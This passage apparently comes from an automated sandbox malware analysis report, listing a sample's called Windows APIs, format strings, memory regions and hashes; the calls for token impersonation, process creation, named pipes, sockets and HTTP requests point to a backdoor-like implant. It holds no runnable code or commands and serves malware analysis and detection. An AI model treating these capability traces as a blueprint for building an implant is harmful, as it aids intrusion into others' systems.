                • Instruction Fuzzy Hash: B8420372608F9886FB25CBEDD54837EABA5F741B88F1C5086DE46D7A98DB78C540CB00
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 038A043D
                  • Part of subcall function 0389F454: _getptd.LIBCMT ref: 0389F46A
                  • Part of subcall function 0389F454: __updatetlocinfo.LIBCMT ref: 0389F49F
                  • Part of subcall function 0389F454: __updatetmbcinfo.LIBCMT ref: 0389F4C6
                • _errno.LIBCMT ref: 038A0442
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • _fileno.LIBCMT ref: 038A046F
                  • Part of subcall function 038A3914: _errno.LIBCMT ref: 038A391D
                  • Part of subcall function 038A3914: _invalid_parameter_noinfo.LIBCMT ref: 038A3928
                • write_multi_char.LIBCMT ref: 038A0A9F
                • write_string.LIBCMT ref: 038A0ABC
                • write_multi_char.LIBCMT ref: 038A0AD9
                • write_string.LIBCMT ref: 038A0B38
                • write_string.LIBCMT ref: 038A0B6F
                • write_multi_char.LIBCMT ref: 038A0B91
                • free.LIBCMT ref: 038A0BA5
                • _isleadbyte_l.LIBCMT ref: 038A0C76
                • write_char.LIBCMT ref: 038A0C8C
                • write_char.LIBCMT ref: 038A0CAD
                • _errno.LIBCMT ref: 038A0DA7
                • _invalid_parameter_noinfo.LIBCMT ref: 038A0DB2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                • String ID:
                • API String ID: 3318157856-3916222277
                • Opcode ID: 442108010190e59218a5984551b34ec8e46758b4fb98f8e7cd36874cc15003ad
                • Instruction ID: 7900f1a16edf4d03393bdda8915d6e0e3452eeeafffb2facfc70cbb6161a9d9b
                • Opcode Fuzzy Hash: 442108010190e59218a5984551b34ec8e46758b4fb98f8e7cd36874cc15003ad
                • Instruction Fuzzy Hash: 853231F2608F8886FB24CBEDD9443BEABA4B745788F1C5086DE8AC7654DB78D541CB01
                APIs
                  • Part of subcall function 0349E89B: _getptd.LIBCMT ref: 0349E8B1
                  • Part of subcall function 0349E89B: __updatetlocinfo.LIBCMT ref: 0349E8E6
                  • Part of subcall function 0349E89B: __updatetmbcinfo.LIBCMT ref: 0349E90D
                • _errno.LIBCMT ref: 034A033D
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • _fileno.LIBCMT ref: 034A036A
                  • Part of subcall function 034A2D5B: _errno.LIBCMT ref: 034A2D64
                  • Part of subcall function 034A2D5B: _invalid_parameter_noinfo.LIBCMT ref: 034A2D6F
                • write_multi_char.LIBCMT ref: 034A09A6
                • write_string.LIBCMT ref: 034A09C3
                • write_multi_char.LIBCMT ref: 034A09E0
                • write_string.LIBCMT ref: 034A0A3F
                • write_multi_char.LIBCMT ref: 034A0A98
                • free.LIBCMT ref: 034A0AAC
                • _isleadbyte_l.LIBCMT ref: 034A0B7D
                • write_char.LIBCMT ref: 034A0B93
                • write_char.LIBCMT ref: 034A0BB4
                • _errno.LIBCMT ref: 034A0CB7
                • _invalid_parameter_noinfo.LIBCMT ref: 034A0CC2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                • String ID: $@
                • API String ID: 3613058218-1077428164
                • Opcode ID: 378339f2bfa88e71ac19cea4aeeb69c74ed1450f75d131b3461b833e448d52f1
                • Instruction ID: 2a8d59ffd3274e259ab46c70ca1a1060c0aa53412f494e132359aee611b7618f
                • Opcode Fuzzy Hash: 378339f2bfa88e71ac19cea4aeeb69c74ed1450f75d131b3461b833e448d52f1
                • Instruction Fuzzy Hash: CD520730918F498EEB2CDB5CC4543BAB7D5FBB5304F28422FD897CB251D674D8468A8A
                APIs
                  • Part of subcall function 0349E89B: _getptd.LIBCMT ref: 0349E8B1
                  • Part of subcall function 0349E89B: __updatetlocinfo.LIBCMT ref: 0349E8E6
                  • Part of subcall function 0349E89B: __updatetmbcinfo.LIBCMT ref: 0349E90D
                • _errno.LIBCMT ref: 0349F889
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • _fileno.LIBCMT ref: 0349F8B6
                  • Part of subcall function 034A2D5B: _errno.LIBCMT ref: 034A2D64
                  • Part of subcall function 034A2D5B: _invalid_parameter_noinfo.LIBCMT ref: 034A2D6F
                • write_multi_char.LIBCMT ref: 0349FEE6
                • write_string.LIBCMT ref: 0349FF03
                • write_multi_char.LIBCMT ref: 0349FF20
                • write_string.LIBCMT ref: 0349FF7F
                • write_multi_char.LIBCMT ref: 0349FFD8
                • free.LIBCMT ref: 0349FFEC
                • _isleadbyte_l.LIBCMT ref: 034A00BD
                • write_char.LIBCMT ref: 034A00D3
                • write_char.LIBCMT ref: 034A00F4
                • _errno.LIBCMT ref: 034A01EE
                • _invalid_parameter_noinfo.LIBCMT ref: 034A01F9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                • String ID:
                • API String ID: 3613058218-3916222277
                • Opcode ID: ab974c686d4cf2a6d6f964f9f08ddbfde3681fa99218c6095000c369d33f032e
                • Instruction ID: d36a7c5203955588c7855b1369e0d9d58d085e1f5c3290d2456f7eb1d52cdb27
                • Opcode Fuzzy Hash: ab974c686d4cf2a6d6f964f9f08ddbfde3681fa99218c6095000c369d33f032e
                • Instruction Fuzzy Hash: 43523C31918F498EEF2CCB1CD8546BABBD5FBA5301F28422FD897CB251D634D847864A
                APIs
                • _snprintf.LIBCMT ref: 038963EE
                • _snprintf.LIBCMT ref: 0389640B
                • _snprintf.LIBCMT ref: 0389632D
                  • Part of subcall function 0389D57C: _errno.LIBCMT ref: 0389D5B3
                  • Part of subcall function 0389D57C: _invalid_parameter_noinfo.LIBCMT ref: 0389D5BE
                • _snprintf.LIBCMT ref: 03896660
                • _snprintf.LIBCMT ref: 038969BC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf$_errno_invalid_parameter_noinfo
                • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                • API String ID: 3442832105-1222817042
                • Opcode ID: 1f56280164754b5557220eac88cc4c9762102babc9b28307cf2a7c73b7346fc6
                • Instruction ID: 48c8d17394d46a7466ef488f1c0ad426f3b575d89b0ddb223925e2b5e3131a07
                • Opcode Fuzzy Hash: 1f56280164754b5557220eac88cc4c9762102babc9b28307cf2a7c73b7346fc6
                • Instruction Fuzzy Hash: 6432C765614E8592FF15CBADE0012E9A3B0FF957A9F085142DF895BB24FF38D2A6C340
                APIs
                • malloc.LIBCMT ref: 03890F5B
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                  • Part of subcall function 0388CFCC: malloc.LIBCMT ref: 0388CFDF
                  • Part of subcall function 0388CFFC: htonl.WS2_32 ref: 0388D007
                • GetCurrentDirectoryA.KERNEL32 ref: 03890FD3
                • FindFirstFileA.KERNEL32 ref: 0389100C
                • GetLastError.KERNEL32 ref: 0389101B
                • free.LIBCMT ref: 03891056
                • free.LIBCMT ref: 03891063
                  • Part of subcall function 0389D188: HeapFree.KERNEL32 ref: 0389D19E
                  • Part of subcall function 0389D188: _errno.LIBCMT ref: 0389D1A8
                  • Part of subcall function 0389D188: GetLastError.KERNEL32 ref: 0389D1B0
                • FileTimeToSystemTime.KERNEL32 ref: 03891070
                • SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 03891081
                • FindNextFileA.KERNEL32 ref: 0389113E
                • FindClose.KERNEL32 ref: 0389114F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                • API String ID: 723279517-1754256099
                • Opcode ID: dd787fa29133a0fd75daa2a63f366151dc49c673a2593fbac1e01e080f930c93
                • Instruction ID: ee6905781db849dad6654202525d43f17f681ced8a0eaf347267497f68475eac
                • Opcode Fuzzy Hash: dd787fa29133a0fd75daa2a63f366151dc49c673a2593fbac1e01e080f930c93
                • Instruction Fuzzy Hash: B551E47630875586EB10EFA6E84039EF7A5F385B94F444056EE4987B98EF7CC60ACB01
                APIs
                • CreateProcessAsUserA.ADVAPI32 ref: 0389029B
                • GetLastError.KERNEL32 ref: 038902A9
                • GetLastError.KERNEL32 ref: 038902CD
                  • Part of subcall function 0388FA80: MultiByteToWideChar.KERNEL32 ref: 0388FAAD
                  • Part of subcall function 0388FA80: MultiByteToWideChar.KERNEL32 ref: 0388FAD5
                • CreateProcessA.KERNEL32 ref: 0389031F
                • GetLastError.KERNEL32 ref: 03890329
                • GetCurrentDirectoryW.KERNEL32 ref: 03890679
                • GetCurrentDirectoryW.KERNEL32 ref: 03890693
                • CreateProcessWithTokenW.ADVAPI32 ref: 038906D7
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                • String ID:
                APIs
                • malloc.LIBCMT ref: 0389783B
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • _snprintf.LIBCMT ref: 03897853
                  • Part of subcall function 0389D57C: _errno.LIBCMT ref: 0389D5B3
                  • Part of subcall function 0389D57C: _invalid_parameter_noinfo.LIBCMT ref: 0389D5BE
                • FindFirstFileA.KERNEL32 ref: 0389785E
                • free.LIBCMT ref: 0389786A
                  • Part of subcall function 0389D188: HeapFree.KERNEL32 ref: 0389D19E
                  • Part of subcall function 0389D188: _errno.LIBCMT ref: 0389D1A8
                  • Part of subcall function 0389D188: GetLastError.KERNEL32 ref: 0389D1B0
                • malloc.LIBCMT ref: 038978BA
                • _snprintf.LIBCMT ref: 038978D2
                • free.LIBCMT ref: 038978FA
                • FindNextFileA.KERNEL32 ref: 03897913
                • FindClose.KERNEL32 ref: 03897924
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                • String ID: %s\*
                APIs
                • RtlCaptureContext.KERNEL32 ref: 00401A84
                • RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
                • RtlVirtualUnwind.KERNEL32 ref: 00401ADD
                • SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
                • UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
                • GetCurrentProcess.KERNEL32 ref: 00401B34
                • TerminateProcess.KERNEL32 ref: 00401B42
                • abort.MSVCRT ref: 00401B48
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                • String ID:
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: bindclosesockethtonsioctlsocketlistensocket
                • String ID:
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                • String ID:
                APIs
                  • Part of subcall function 0389BC70: RevertToSelf.ADVAPI32 ref: 0389BC8D
                • LogonUserA.ADVAPI32 ref: 0389BF38
                • GetLastError.KERNEL32 ref: 0389BF42
                  • Part of subcall function 0389473C: malloc.LIBCMT ref: 03894758
                  • Part of subcall function 0388FA80: MultiByteToWideChar.KERNEL32 ref: 0388FAAD
                  • Part of subcall function 0388FA80: MultiByteToWideChar.KERNEL32 ref: 0388FAD5
                  • Part of subcall function 0388CFCC: malloc.LIBCMT ref: 0388CFDF
                • ImpersonateLoggedOnUser.ADVAPI32 ref: 0389BF60
                • GetLastError.KERNEL32 ref: 0389BF6A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
                • String ID: %s\%s
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: CountSleepTick$closesocket
                • String ID:
                APIs
                • GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
                • GetCurrentProcessId.KERNEL32 ref: 004019E0
                • GetCurrentThreadId.KERNEL32 ref: 004019E8
                • GetTickCount.KERNEL32 ref: 004019F0
                • QueryPerformanceCounter.KERNEL32 ref: 004019FE
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                • String ID:
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: bindclosesockethtonslistensocket
                • String ID:
                APIs
                • LookupPrivilegeValueA.ADVAPI32 ref: 0388FEF6
                • AdjustTokenPrivileges.ADVAPI32 ref: 0388FF26
                • GetLastError.KERNEL32 ref: 0388FF30
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                • String ID: %s
                APIs
                • GetTickCount.KERNEL32 ref: 03893FCB
                • Sleep.KERNEL32 ref: 0389401A
                • GetTickCount.KERNEL32 ref: 03894020
                • WSAGetLastError.WS2_32 ref: 0389402A
                  • Part of subcall function 03894170: ioctlsocket.WS2_32 ref: 03894192
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: CountTick$ErrorLastSleepioctlsocket
                • String ID:
                APIs
                  • Part of subcall function 03894864: htonl.WS2_32 ref: 03894881
                • GetLastError.KERNEL32 ref: 0388DA74
                  • Part of subcall function 0389ADBC: GetCurrentProcess.KERNEL32 ref: 0389AE49
                • HeapCreate.KERNEL32 ref: 0388DA1B
                • HeapAlloc.KERNEL32 ref: 0388DA39
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
                • String ID:
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID:
                • String ID: $<
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Similarity
                • API ID: _initp_misc_winsig
                • String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: free
                • String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: free
                • String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                • Instruction ID: 838e0d35cd9232a0f2a1d42b5f37fe44f6142018ddcfc68db82b5a699939d207
                • Opcode Fuzzy Hash: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                • Instruction Fuzzy Hash: 05C04C97A149D187D7129A5408A51952B63E5D2C3238E82D98D9187E43510A6817A311
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                • Instruction ID: 71b433a99c172f529f5ff5a09c463be7f4425a949e62f20f949fdf9a882c0cd2
                • Opcode Fuzzy Hash: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                • Instruction Fuzzy Hash: FDC012DBE5DEC58AE323C1940C6405F2EB294B281431E8086CF4856351A24608004251
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: acceptioctlsocket$closesockethtonlselect
                • String ID:
                • API String ID: 2003300010-0
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: strtok$malloc$_time64$ErrorFreeHeapLast_errno_getptdfree
                • String ID:
                • API String ID: 620445413-0
                APIs
                • _snprintf.LIBCMT ref: 0388E975
                  • Part of subcall function 0389D57C: _errno.LIBCMT ref: 0389D5B3
                  • Part of subcall function 0389D57C: _invalid_parameter_noinfo.LIBCMT ref: 0389D5BE
                • _snprintf.LIBCMT ref: 0388E991
                • _snprintf.LIBCMT ref: 0388EA07
                • _snprintf.LIBCMT ref: 0388EA1E
                  • Part of subcall function 0389D57C: _flsbuf.LIBCMT ref: 0389D61D
                • HttpOpenRequestA.WININET ref: 0388EA6A
                • HttpSendRequestA.WININET ref: 0388EA9D
                • InternetCloseHandle.WININET ref: 0388EAB2
                • Sleep.KERNEL32 ref: 0388EABD
                • InternetCloseHandle.WININET ref: 0388EAD0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep_errno_flsbuf_invalid_parameter_noinfo
                • String ID: %s%s$*/*
                • API String ID: 3364845851-856325523
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                • String ID:
                • API String ID: 34948862-0
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                • String ID:
                • API String ID: 4099253644-0
                APIs
                • _errno.LIBCMT ref: 0389DD76
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • _invalid_parameter_noinfo.LIBCMT ref: 0389DD82
                • __crtIsPackagedApp.LIBCMT ref: 0389DD93
                • AreFileApisANSI.KERNEL32 ref: 0389DDA2
                • MultiByteToWideChar.KERNEL32 ref: 0389DDC8
                • GetLastError.KERNEL32 ref: 0389DDD5
                • _dosmaperr.LIBCMT ref: 0389DDDD
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1138158220-0
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                • String ID: d
                • API String ID: 1257931466-2564639436
                APIs
                • _errno.LIBCMT ref: 034A4155
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • __doserrno.LIBCMT ref: 034A414C
                  • Part of subcall function 0349EFA3: _getptd_noexit.LIBCMT ref: 0349EFA7
                • __doserrno.LIBCMT ref: 034A41B2
                • _errno.LIBCMT ref: 034A41B9
                • _invalid_parameter_noinfo.LIBCMT ref: 034A421D
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Similarity
                • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                • String ID:
                • API String ID: 388111225-0
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: CountTick$ErrorLastSleepselectsend
                • String ID: d
                • API String ID: 2152284305-2564639436
                APIs
                • _errno.LIBCMT ref: 034A4F3A
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • __doserrno.LIBCMT ref: 034A4F32
                  • Part of subcall function 0349EFA3: _getptd_noexit.LIBCMT ref: 0349EFA7
                • __lock_fhandle.LIBCMT ref: 034A4F7E
                • _lseeki64_nolock.LIBCMT ref: 034A4F97
                • _unlock_fhandle.LIBCMT ref: 034A4FBA
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
                • String ID:
                • API String ID: 2644381645-0
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                • String ID:
                • API String ID: 3101085627-0
                APIs
                • _errno.LIBCMT ref: 034A4DC2
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • __doserrno.LIBCMT ref: 034A4DBA
                  • Part of subcall function 0349EFA3: _getptd_noexit.LIBCMT ref: 0349EFA7
                • __lock_fhandle.LIBCMT ref: 034A4E06
                • _lseek_nolock.LIBCMT ref: 034A4E1F
                • _unlock_fhandle.LIBCMT ref: 034A4E40
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
                • String ID:
                • API String ID: 1078912150-0
                APIs
                • _errno.LIBCMT ref: 038A4D0E
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • __doserrno.LIBCMT ref: 038A4D05
                  • Part of subcall function 0389FB5C: _getptd_noexit.LIBCMT ref: 0389FB60
                • __doserrno.LIBCMT ref: 038A4D6B
                • _errno.LIBCMT ref: 038A4D72
                • _invalid_parameter_noinfo.LIBCMT ref: 038A4DD6
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
